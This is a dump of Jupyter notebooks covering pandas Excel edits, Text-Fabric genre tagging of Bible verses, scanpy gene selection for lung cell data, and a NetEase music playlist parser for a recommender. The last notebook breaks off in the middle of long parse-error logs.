cb2bd4d8c16155175af724aba046731f17d49e5b | 6,347 | ipynb | Jupyter Notebook | pandas_excel.ipynb | PegasusWang/notebooks | 78a88de2ed2e858d3b1f997d0e5155a37e70b82c | [
"MIT"
] | 38 | 2018-02-14T05:40:17.000Z | 2021-09-26T10:14:57.000Z | pandas_excel.ipynb | PegasusWang/notebooks | 78a88de2ed2e858d3b1f997d0e5155a37e70b82c | [
"MIT"
] | null | null | null | pandas_excel.ipynb | PegasusWang/notebooks | 78a88de2ed2e858d3b1f997d0e5155a37e70b82c | [
"MIT"
] | 11 | 2018-02-13T22:52:59.000Z | 2020-07-14T04:04:54.000Z | 27.960352 | 85 | 0.332125 | [
[
[
"# pip install pandas\nimport pandas as pd\ndf = pd.read_excel('stock_data.xlsx') # DataFrame\ndf",
"_____no_output_____"
],
[
"df['revenue'] = df['revenue'].replace(-1, 0)\ndf['price'] = df['price'].replace('n.a.', 0)\ndf['lower_tickers'] = df['tickers'].apply(lambda ticker: ticker.lower())\ndf['double_price'] = df['price'] * 2\ndf",
"_____no_output_____"
],
[
"df.to_excel('new_stock.xlsx')",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code"
]
] |
cb2bec79372d1fb07380517e77dbce0fe18ef083 | 77,782 | ipynb | Jupyter Notebook | ranges2tf.ipynb | ETCBC/genre_synvar | 565f675d83e4de1e3c1c69a10bd5c58cd306cf36 | [
"MIT"
] | 1 | 2020-06-16T19:47:48.000Z | 2020-06-16T19:47:48.000Z | ranges2tf.ipynb | ETCBC/genre_synvar | 565f675d83e4de1e3c1c69a10bd5c58cd306cf36 | [
"MIT"
] | 1 | 2020-06-16T19:52:06.000Z | 2020-06-17T13:55:46.000Z | ranges2tf.ipynb | ETCBC/genre_synvar | 565f675d83e4de1e3c1c69a10bd5c58cd306cf36 | [
"MIT"
] | null | null | null | 36.793756 | 9,907 | 0.420419 | [
[
[
"# Convert verse ranges of genres to TF verse node features",
"_____no_output_____"
]
],
[
[
"import collections\nimport pandas as pd\nfrom tf.fabric import Fabric\nfrom tf.compose import modify\nfrom tf.app import use\nA = use('bhsa', hoist=globals())",
"_____no_output_____"
],
[
"genre_ranges = pd.read_csv('genre_ranges.csv')",
"_____no_output_____"
],
[
"genre_ranges",
"_____no_output_____"
]
],
[
[
"# Compile data & sanity checks",
"_____no_output_____"
]
],
[
[
"# check book values\ngenre_ranges.book.unique()",
"_____no_output_____"
],
[
"# check genre values\ngenre_ranges.genre.unique()",
"_____no_output_____"
],
[
"# check book name alignment with BHSA english names\nfor book in genre_ranges.book.unique():\n bhsa_node = T.nodeFromSection((book,))\n if not bhsa_node:\n raise Exception(book)",
"_____no_output_____"
],
[
"def verse_node_range(start, end, tf_api):\n \"\"\"Generate a list of verse nodes for a given range of reference tuples.\n \n Note that start and end are both inclusive bounds.\n \n Args:\n start: 3-tuple of (book, n_ch, n_vs)\n end: 3-tuple of (book, n_ch, n_vs)\n Returns:\n list of nodes\n \"\"\"\n start_node = tf_api.T.nodeFromSection(start)\n end_node = tf_api.T.nodeFromSection(end)\n nodes = [start_node]\n while nodes[-1] < end_node:\n nodes.append(tf_api.L.n(nodes[-1],'verse')[0])\n return nodes",
"_____no_output_____"
],
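[
"# --- Hedged sanity check, not part of the original notebook ---\n# verse_node_range uses inclusive bounds, so Genesis 1:1 - 1:3 should give\n# exactly the three verse nodes for Genesis 1:1, 1:2 and 1:3.\ncheck_nodes = verse_node_range(('Genesis', 1, 1), ('Genesis', 1, 3), A.api)\n[T.sectionFromNode(v) for v in check_nodes]",
"_____no_output_____"
],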
[
"# check for missing verses\n# or double-counted verses\n\nverse2genre = {} # will be used for TF export\nverse2count = collections.Counter()\n\nfor book, startch, startvs, endch, endvs, genre in genre_ranges.values:\n start = (book, startch, startvs)\n end = (book, endch, endvs)\n for verse in verse_node_range(start, end, A.api):\n verse2genre[verse] = genre\n verse2count[verse] += 1\n \n# check for double-labeled verses\nfor verse,count in verse2count.items():\n if count > 1:\n print(verse, T.sectionFromNode(verse))",
"_____no_output_____"
],
[
"# check for missing verses\nall_verses = set(F.otype.s('verse'))\nfor missing_verse in (all_verses - set(verse2genre.keys())):\n print(missing_verse, T.sectionFromNode(missing_verse))",
"_____no_output_____"
],
[
"#verse2genre",
"_____no_output_____"
]
],
[
[
"# Export TF Features",
"_____no_output_____"
]
],
[
[
"nodeFeatures = {'genre': verse2genre}\nfeatureMeta = {\n 'genre': {\n 'description': '(sub)genre of a verse node',\n 'authors': 'Dirk Bakker, Marianne Kaajan, Martijn Naaijer, Wido van Peursen, Janet Dyk',\n 'origin': 'the genre feature was tagged during the NWO-funded syntactic variation project (2013-2018) of the ETCBC, VU Amsterdam',\n 'source_URL': 'https://github.com/MartijnNaaijer/phdthesis/blob/master/Various/subgenres_synvar.xls',\n 'valueType': 'str',\n } \n}",
"_____no_output_____"
],
[
"TF = Fabric('tf/c')\nTF.save(nodeFeatures=nodeFeatures, metaData=featureMeta)",
"This is Text-Fabric 8.3.2\nApi reference : https://annotation.github.io/text-fabric/cheatsheet.html\n\n1 features found and 0 ignored\n 0.00s Warp feature \"otype\" not found in\ntf/c/\n 0.00s Warp feature \"oslots\" not found in\ntf/c/\n 0.01s Warp feature \"otext\" not found. Working without Text-API\n\n 0.00s Exporting 1 node and 0 edge and 0 config features to tf/c:\n | 0.04s T genre to tf/c\n 0.04s Exported 1 node features and 0 edge features and 0 config features to tf/c\n"
]
],
[
[
"## Tests",
"_____no_output_____"
]
],
[
[
"TF = Fabric(locations=['~/github/etcbc/bhsa/tf/c', 'tf/c'])\nAPI = TF.load('genre')\nAPI.makeAvailableIn(globals())",
"This is Text-Fabric 8.3.2\nApi reference : https://annotation.github.io/text-fabric/cheatsheet.html\n\n115 features found and 0 ignored\n 0.00s loading features ...\n | 0.00s Dataset without structure sections in otext:no structure functions in the T-API\n 4.09s All features loaded/computed - for details use loadLog()\n"
],
[
"F.otype.s('verse')",
"_____no_output_____"
],
[
"verse_data = []\n\nfor verse_n in F.otype.s('verse'):\n genre = F.genre.v(verse_n)\n book, chapter, verse = T.sectionFromNode(verse_n)\n ref = f'{book} {chapter}:{verse}'\n verse_data.append({\n 'node': verse_n,\n 'ref': ref,\n 'book': book,\n 'genre': genre,\n 'text': T.text(verse_n),\n })\n \nverse_df = pd.DataFrame(verse_data)\nverse_df.set_index('node', inplace=True)\nverse_df.head()",
"_____no_output_____"
],
[
"# save a .csv copy\nverse_df[['ref', 'genre']].to_csv('verse2genre.csv', index=False)",
"_____no_output_____"
],
[
"verse_df.genre.value_counts()",
"_____no_output_____"
],
[
"verse_df[verse_df.genre == 'prophetic'].book.value_counts()",
"_____no_output_____"
],
[
"verse_df[verse_df.genre == 'list'].book.value_counts()",
"_____no_output_____"
],
[
"# How many verses per book are a given genre?\n\nbook2genre = pd.pivot_table(\n verse_df,\n index='book',\n columns=['genre'],\n aggfunc='size',\n fill_value=0,\n)\n\nbook2genre",
"_____no_output_____"
],
[
"# get percentages\n\nbook2genre.div(book2genre.sum(1), 0)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2bee4291d3b8afa3bcc49dd56963a94bf8c2bf | 70,182 | ipynb | Jupyter Notebook | notebooks/1_building_and_annotating_the_atlas_core/03_hvg_selection_log_transf.ipynb | LungCellAtlas/HLCA_reproducibility | 4d564ac9f4c5b12421ec6c596169eb8675b08f8b | [
"MIT"
] | null | null | null | notebooks/1_building_and_annotating_the_atlas_core/03_hvg_selection_log_transf.ipynb | LungCellAtlas/HLCA_reproducibility | 4d564ac9f4c5b12421ec6c596169eb8675b08f8b | [
"MIT"
] | null | null | null | notebooks/1_building_and_annotating_the_atlas_core/03_hvg_selection_log_transf.ipynb | LungCellAtlas/HLCA_reproducibility | 4d564ac9f4c5b12421ec6c596169eb8675b08f8b | [
"MIT"
] | null | null | null | 231.623762 | 40,556 | 0.925152 | [
[
[
"## Highly variable gene selection and log-transformation",
"_____no_output_____"
],
[
"In this notebook we select highly variable genes and perform log-transformation of normalized counts for downstream analysis",
"_____no_output_____"
],
[
"#### Import modules:",
"_____no_output_____"
]
],
[
[
"import scanpy as sc\nimport matplotlib.pyplot as plt\nimport numpy as np",
"_____no_output_____"
]
],
[
[
"#### Set paths:",
"_____no_output_____"
]
],
[
[
"path_input_data = \"../../data/HLCA_core_h5ads/HLCA_v1_intermediates/LCA_Bano_Barb_Jain_Kras_Lafy_Meye_Mish_MishBud_Nawi_Seib_Teic_SCRAN_normalized_filt.h5ad\"\npath_output_data = \"../../data/HLCA_core_h5ads/HLCA_v1_intermediates/LCA_Bano_Barb_Jain_Kras_Lafy_Meye_Mish_MishBud_Nawi_Seib_Teic_log1p.h5ad\"",
"_____no_output_____"
]
],
[
[
"#### Perform hvg selection:",
"_____no_output_____"
],
[
"import data:",
"_____no_output_____"
]
],
[
[
"adata = sc.read(path_input_data)",
"_____no_output_____"
]
],
[
[
"select highly variable genes...",
"_____no_output_____"
]
],
[
[
"# function to calculate variances on *sparse* matrix\ndef vars(a, axis=None):\n \"\"\" Variance of sparse matrix a\n var = mean(a**2) - mean(a)**2\n \"\"\"\n a_squared = a.copy()\n a_squared.data **= 2\n return a_squared.mean(axis) - np.square(a.mean(axis))",
"_____no_output_____"
]
],
[
[
"calculate mean, variance, dispersion per gene:",
"_____no_output_____"
]
],
[
[
"means = np.mean(adata.X, axis=0)",
"_____no_output_____"
],
[
"variances = vars(adata.X, axis=0)",
"_____no_output_____"
],
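[
"# --- Hedged sanity check, not part of the original notebook ---\n# Verify on a small toy matrix that the sparse variance helper above matches\n# numpy's dense variance (assumes scipy is available in this environment).\nfrom scipy.sparse import csr_matrix\n\ntoy = csr_matrix(np.array([[0.0, 1.0, 2.0], [3.0, 0.0, 1.0]]))\nnp.allclose(vars(toy, axis=0), toy.toarray().var(axis=0))",
"_____no_output_____"
],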
[
"dispersions = variances / means",
"_____no_output_____"
]
],
[
[
"set min_mean cutoff (base this on the plot). We do not want to include the leftmost noisy genes that have high dispersions due to low means.",
"_____no_output_____"
]
],
[
[
"min_mean = 0.06",
"_____no_output_____"
],
[
"# plot mean versus dispersion plot:\n# now plot\nplt.scatter(\n np.log1p(means).tolist()[0], np.log(dispersions).tolist()[0], s=2\n)\nplt.vlines(x=np.log1p(min_mean),ymin=-2,ymax=8,color='red')\nplt.xlabel(\"log1p(mean)\")\nplt.ylabel(\"log(dispersion)\")\nplt.title(\"DISPERSION VERSUS MEAN\")\nplt.show()",
"_____no_output_____"
]
],
[
[
"log-transform data:",
"_____no_output_____"
]
],
[
[
"sc.pp.log1p(adata)",
"_____no_output_____"
]
],
[
[
"now calculate highly variable genes:",
"_____no_output_____"
]
],
[
[
"sc.pp.highly_variable_genes(adata, batch_key=\"dataset\",min_mean=min_mean, flavor=\"cell_ranger\",n_top_genes=2000)",
"/home/icb/lisa.sikkema/miniconda3/envs/scRNAseq_analysis/lib/python3.7/site-packages/pandas/core/indexing.py:671: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame\n\nSee the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n self._setitem_with_indexer(indexer, value)\n"
]
],
[
[
"check selection of genes:",
"_____no_output_____"
]
],
[
[
"boolean_to_color = {\n True: \"crimson\",\n False: \"steelblue\",\n} # make a dictionary that translates the boolean to colors\nhvg_colors = adata.var.highly_variable.map(boolean_to_color) # 'convert' the boolean\n# now plot\nplt.scatter(\n np.log1p(means).tolist()[0], np.log(dispersions).tolist()[0], s=1, c=hvg_colors\n)\nplt.xlabel(\"log1p(mean)\")\nplt.ylabel(\"log(dispersion)\")\nplt.title(\"DISPERSION VERSUS MEAN\")\nplt.show()",
"_____no_output_____"
]
],
[
[
"store",
"_____no_output_____"
]
],
[
[
"adata.write(path_output_data)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2c0f828ba741f5ce9a0a782041d675842be406 | 233,692 | ipynb | Jupyter Notebook | RecommendSystem/RecommendSystem-in-NetEaseMusic.ipynb | Yazooliu/TempCode | e579b8b6eb4657267e9bc9589e47becbbe4ef72b | [
"MIT"
] | null | null | null | RecommendSystem/RecommendSystem-in-NetEaseMusic.ipynb | Yazooliu/TempCode | e579b8b6eb4657267e9bc9589e47becbbe4ef72b | [
"MIT"
] | null | null | null | RecommendSystem/RecommendSystem-in-NetEaseMusic.ipynb | Yazooliu/TempCode | e579b8b6eb4657267e9bc9589e47becbbe4ef72b | [
"MIT"
] | 1 | 2021-12-04T13:33:54.000Z | 2021-12-04T13:33:54.000Z | 37.200255 | 279 | 0.491322 | [
[
[
"#---------\n# Recommend System in NetEase \n# \n# Modify History : 2019 - Jan - 22 \n# Platform: Win7 + Python2 \n#---------",
"_____no_output_____"
]
],
[
[
"### 1 从原始文件中抽取期望的歌单数据",
"_____no_output_____"
]
],
[
[
"#coding:urf-8\nimport json \nimport sys\n\n# 从Json文件中提取特定格式的文本数据 #\n# 返回的文本格式:歌曲名字##歌曲标签##歌单ID##歌曲收藏数目 歌曲信息\ndef parse_song_inline(in_line):\n loaded_data = json.loads(in_line)\n name = loaded_data['result']['name'] # 名字\n tags = \",\".join(loaded_data['result']['tags'])# 标签\n subscribed_count = loaded_data['result']['subscribedCount'] # 收藏数目\n \n if subscribed_count <= 100:\n #print \"subscribed_count is less than 100, please check data ...\"\n return False\n playlist_id = loaded_data['result']['id'] # 歌单ID\n tracks = loaded_data['result']['tracks'] # \"tracks\": [{歌曲1},{歌曲2}, ...]\n \n song_inforcontent = ''\n for track in tracks:\n try: # 歌曲信息中包含: => 歌单ID:::歌曲名字:::歌手名字:::歌曲流行度\n song_inforcontent += \"\\t\" + \":::\".join([str(track['id']),track['name'],track['artists'][0]['name'],str(track['popularity'])])\n except Exception,e:\n print \"Exception information 1\",e\n print track\n continue\n # 获取如下格式的文本信息\n # 格式:歌曲名字##歌曲标签##歌单ID##歌曲收藏数目 歌曲信息\n GotText = name+\"##\"+tags+\"##\"+str(playlist_id)+'##'+str(subscribed_count)+song_inforcontent\n return GotText\n\n# 将抽取的文本写入特定的text文件\ndef parse_files(input_file,out_file):\n outdata = open(out_file,'w')\n for line in open(input_file):\n GotText = parse_song_inline(line)\n if GotText:\n outdata.write(GotText.encode('utf-8').strip()+\"\\n\")\n outdata.close()",
"_____no_output_____"
],
[
"%time parse_files(\"./RawData/playlistdetail.all.json\",\"./InternalData/1_music_playlist_info.txt\")",
"Wall time: 15min 47s\n"
]
],
[
[
"### 2 将歌单数据处理成适用于推荐系统的数据格式",
"_____no_output_____"
]
],
[
[
"import surprise\nimport lightfm\n# project = offline modeleing + oneline prediction \n\n# 推荐机制:\n# 1.针对用户推荐,每日推荐7 - 30首歌曲\n# 2.针对你听到的歌曲,推荐类似的歌曲\n# 3.针对你喜欢的歌手,推荐类似的歌手给用户",
"c:\\python27\\lib\\site-packages\\lightfm\\_lightfm_fast.py:9: UserWarning: LightFM was compiled without OpenMP support. Only a single thread will be used.\n warnings.warn('LightFM was compiled without OpenMP support. '\n"
],
[
"#coding:utf-8 \n#为适应于surprise模型,将数据解析成userid itemid rating timestamp 行格式\nimport json\nimport sys\n\n# check is null or not \ndef is_null(s):\n return len(s.split(\",\"))>2\n\ndef parse_song_inforcontent(song_inforcontent):\n try:\n song_id,name,artist,popularity = song_inforcontent.split(\":::\")\n return \",\".join([song_id,\"1.0\",'1300000'])\n #return \",\".join([song_id, name, artist, popularity])\n except Exception,e:\n #print \"Exception information 2 \",e\n #print song_inforcontent\n return \" \"\n\n\ndef parse_playlist_inline(in_line):\n try:\n contents = in_line.strip().split(\"\\t\") # strip 取出字符串首尾字符,默认是取出空格\n name,tags,playlist_id,subscribed_count = contents[0].split(\"##\")\n songs_infor = map(lambda x: playlist_id +\",\"+ parse_song_inforcontent(x),contents[1:])\n \n # filter (function,iterable): 将iterable 作用于function逐个判断,将满足条件的iterable 返回新list\n songs_information = filter(is_null,songs_infor) \n return \"\\n\".join(songs_information)\n except Exception,e:\n #print \"Exception information 3 \",e\n return False\n\n# 将抽取的文本写入特定的text文件\ndef parse_files(input_file,out_file):\n outdata = open(out_file,'w')\n for line in open(input_file):\n GotText = parse_playlist_inline(line)\n if GotText:\n outdata.write(GotText.encode('utf-8').strip()+\"\\n\")\n outdata.close()",
"_____no_output_____"
],
[
"%time parse_files(\"./InternalData/1_music_playlist_info.txt\",\"./InternalData/2_music_playlist_surpriseformat.txt\")",
"Wall time: 6.52 s\n"
]
],
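[
[
"# --- Hedged sketch, not part of the original notebook ---\n# Minimal offline-modeling example with the surprise library, assuming the\n# file 2_music_playlist_surpriseformat.txt written above (lines of the form\n# playlist_id,song_id,1.0,1300000). An item-based KNNBaseline over songs\n# covers mechanism 2 (similar songs); playlist- or artist-level variants\n# would follow the same pattern.\nfrom surprise import Dataset, Reader, KNNBaseline\n\nreader = Reader(line_format='user item rating timestamp', sep=',')\nmusic_data = Dataset.load_from_file('./InternalData/2_music_playlist_surpriseformat.txt', reader=reader)\ntrainset = music_data.build_full_trainset()\n\nalgo = KNNBaseline(sim_options={'name': 'cosine', 'user_based': False})\nalgo.fit(trainset)\n\n# nearest songs for the first song in the trainset; the song.pkl mapping\n# built in section 3 below can translate these ids back to song names\nraw_song_id = trainset.to_raw_iid(0)\nneighbor_inner_ids = algo.get_neighbors(trainset.to_inner_iid(raw_song_id), k=10)\nprint([trainset.to_raw_iid(inner_id) for inner_id in neighbor_inner_ids])",
"_____no_output_____"
]
],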
[
[
"### 处理流行歌单",
"_____no_output_____"
]
],
[
[
"%time parse_files(\"./RawData/popular.playlist\",\"./InternalData/3_music_popularplaylist_surpriseformat.txt\")",
"Wall time: 652 ms\n"
]
],
[
[
"### 3 保存歌曲以及歌单信息以备后面的建模使用",
"_____no_output_____"
],
[
"需要保存歌单ID => 歌单名字,以及歌曲ID =>歌曲名字 的信息以备用",
"_____no_output_____"
]
],
[
[
"#coding:utf-8\nimport cPickle as pickle\nimport sys \ndef parse_playlist_get_infor(in_line,playlist_dic,song_dic):\n contents = in_line.strip().split(\"\\t\")\n name,tags,playlist_id,subscribed_count = contents[0].split(\"##\")\n playlist_dic[playlist_id] = name \n for song in contents[1:]:\n try:\n song_id,song_name,artist,popularity = song.split(\":::\")\n song_dic[song_id] = song_name + \"\\t\" + artist\n except:\n print \"FormatError..\"\n print song + \"\\n\"\n\ndef parse_file(in_file,out_playlist,out_song):\n playlist_dic = {} # 歌单ID 到歌单的映射字典\n song_dic = {} # 歌曲ID到歌曲名字的映射字典\n for line in open(in_file):\n parse_playlist_get_infor(line,playlist_dic,song_dic)\n \n #通过pickle 序列化保存成二进制的文件\n pickle.dump(playlist_dic,open(out_playlist,\"wb\"))\n \n # 通过playlist_doc = pickle.load(open(\"playlist.pkl\",\"rb\")) 重新载入\n pickle.dump(song_dic,open(out_song,\"wb\"))\n ",
"_____no_output_____"
],
[
"%time parse_file(\"./InternalData/1_music_playlist_info.txt\",\"./InternalData/4_playlist.pkl\",\"./InternalData/5_song.pkl\")",
"FormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n4967373:::テニスの王子様::ここからが・・・俺達II\n\nFormatError..\n:::V.A.:::5.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n376653:::野弧禅狂叱(宿香之战)\n\nFormatError..\n:::霹雳英雄:::5.0\n\nFormatError..\n374524:::赎?罪\n\nFormatError..\n赎罪岩:::霹雳英雄:::15.0\n\nFormatError..\n31563610:::\n\nFormatError..\n苍之礼赞:::花之祭P:::65.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n31838468:::Justiφ's(Tv Size Version)\n\nFormatError..\n:::佐藤和豊:::25.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n785061:::幻奏ノ滝\n\nFormatError..\n时音(フォールオブフォール~秋めく滝):::沙紗飛鳥:::65.0\n\nFormatError..\n33190071:::Theme of Blood Blockade Battlefront\n\nFormatError..\n:::岩崎太整:::65.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::90.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n33190071:::Theme of Blood Blockade Battlefront\n\nFormatError..\n:::岩崎太整:::65.0\n\nFormatError..\n33190118:::\n\nFormatError..\nDust:::Toft Willingham:::60.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n424496188:::大王叫我来巡山 - (原唱:\n\nFormatError..\n 贾乃亮/贾云馨):::流浪的蛙蛙:::65.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n427142111:::ウタカタ \n\nFormatError..\n(原曲: ミストレイク):::Re:Volte:::25.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n28684643:::勝利 ~Sengoku3 Mix~ [Bonus Track]\n\nFormatError..\n:::光栄BGM部:::80.0\n\nFormatError..\n28684644:::死亡 ~Sengoku3 Mix~ [Bonus Track]\n\nFormatError..\n:::光栄BGM部:::80.0\n\nFormatError..\n22773056:::ODIN SPHERE’s Theme-Shanachie ver.-【エンディング】\n\nFormatError..\n:::崎元仁:::15.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n33497915:::\n\nFormatError..\nFrédéric Chopin: Ballade for piano No. 1 in G minor, Op. 23, CT. 2:::Jorge Bolet:::5.0\n\nFormatError..\n26902203:::What’s your name? 
(collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n32272104:::\n\nFormatError..\nWonderful Love (Radio Edit):::Money Penny:::80.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n441612015:::不客气\n\nFormatError..\n:::刘世超:::60.0\n\nFormatError..\n441612090:::You're Welcome (Jordan Fisher/Lin-Manuel Miranda Version)\n\nFormatError..\n:::Lin-Manuel Miranda:::35.0\n\nFormatError..\n30474690:::\n\nFormatError..\nLife Of Sin pt.2:::MitiS:::70.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n26249479:::Let's get “あと1センチ\"\n\nFormatError..\n:::AKB48:::20.0\n\nFormatError..\n1342772:::Swan Lake, Op.20 - Act 3 - No.20 Danse hongroise (Czárdás)\n\nFormatError..\nL'Orchestre de la Suisse Romande:::Ernest Ansermet:::5.0\n\nFormatError..\n17742280:::\n\nFormatError..\nJohann Sebastian Bach: Prelude and Fugue in C sharp (WTK, Book, No.3), BWV 848 - Prelude:::Friedrich Gulda:::25.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n26883741:::Concerto For Piano And Orchestra No.2 In E Major, BWV 1053 : \n\nFormatError..\nI. [Allegro]:::Glenn Gould:::20.0\n\nFormatError..\n26883747:::Concerto For Piano And Orchestra No.3 In D Major, BWV 1054 : \n\nFormatError..\nII. Adagio E Piano Sempre:::Glenn Gould:::20.0\n\nFormatError..\n26883754:::Concerto For Piano And Orchestra No.3 In D Major, BWV 1054 : \n\nFormatError..\nIII. Allegro:::Glenn Gould:::20.0\n\nFormatError..\n26883744:::Concerto For Piano And Orchestra No.7 In G Minor, BWV 1058 : \n\nFormatError..\nI. [Allegro]:::Glenn Gould:::20.0\n\nFormatError..\n26883757:::Concerto For Piano And Orchestra No.7 In G Minor, BWV 1058 : \n\nFormatError..\nIII. Allegro Assai:::Glenn Gould:::20.0\n\nFormatError..\n604259:::Sonata for Violin and Piano No. 3 in G minor (1917): I. 
Allegro vivo \n\nFormatError..\nMidori;Robert McDonald:::五嶋美岛丽:::10.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n26884168:::\n\nFormatError..\nAge Of Loneliness (Enigmatic Club Mix):::Enigma:::5.0\n\nFormatError..\n26884170:::\n\nFormatError..\nGravity Of Love (Judgement Day Club Mix):::Enigma:::5.0\n\nFormatError..\n26884172:::\n\nFormatError..\nLight Of Your Smile:::Enigma:::5.0\n\nFormatError..\n26884175:::\n\nFormatError..\nMea Culpa Part Ii (Original Version):::Enigma:::5.0\n\nFormatError..\n26884180:::\n\nFormatError..\nPrinciples Of Lust (Omen Mix):::Enigma:::5.0\n\nFormatError..\n26884182:::\n\nFormatError..\nReturn To Innocence (380 Midnight):::Enigma:::5.0\n\nFormatError..\n26884183:::\n\nFormatError..\nReturn To Innocence (Long):::Enigma:::15.0\n\nFormatError..\n26884186:::\n\nFormatError..\nSadeness Part 1 (Meditation Mix):::Enigma:::5.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n29011079:::\n\nFormatError..\n真的很抱歉:::棒棒堂:::15.0\n\nFormatError..\n26878881:::\n\nFormatError..\nWolfgang Amadeus Mozart: Serenata notturna in D, K.239 - 2. Menuetto - Trio:::Herbert von Karajan:::5.0\n\nFormatError..\n29011079:::\n\nFormatError..\n真的很抱歉:::棒棒堂:::15.0\n\nFormatError..\n604259:::Sonata for Violin and Piano No. 3 in G minor (1917): I. Allegro vivo \n\nFormatError..\nMidori;Robert McDonald:::五嶋美岛丽:::10.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 